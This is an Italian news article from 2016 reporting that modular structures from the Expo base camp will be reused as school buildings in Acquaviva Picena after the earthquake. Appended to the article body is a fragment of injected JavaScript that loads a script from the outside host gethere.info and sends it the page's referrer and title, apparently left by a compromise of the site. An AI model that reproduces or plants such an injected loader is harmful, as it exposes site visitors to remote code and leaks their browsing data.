"/>
domenica 25 febbraio 2018 00:54:44
omnimilano

Terremoto, le strutture del campo base di Expo diventeranno moduli per le scuole di Acquaviva

14 settembre 2016 Politica

“Alcuni manufatti usati nel campo base Expo sono tecnicamente modulabili e potranno quindi essere usati (previa qualche miglioria) come scuole nel comune di Acquaviva Picena”. Lo fa sapere l’assessore regionale alla Sicurezza, Protezione civile e Immigrazione, Simona Bordonali, ricordando che in questi giorni ci sono stati numerosissimi contatti fra la Direzione regionale Protezione civile, la societa’ Edil Sider (incaricata da Expo per la realizzazione dei manufatti), e la Direzione di Comando e Controllo (Dicomac) della Protezione civile. “Dal Dipartimento nazionale – spiega Bordonali – abbiamo appena ricevuto le precise caratteristiche tecniche e le dimensioni dei manufatti necessari al comune di Acquaviva. Queste caratteristiche saranno inoltrate alla societa’ Edil Sider per una verifica finale e per la costruzione di un layout di massima per l’intervento”. “Terminate queste operazioni – conclude Bordonali – il Dipartimento ci fara’ sapere come questi moduli potranno essere destinati al comune di Acquaviva”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo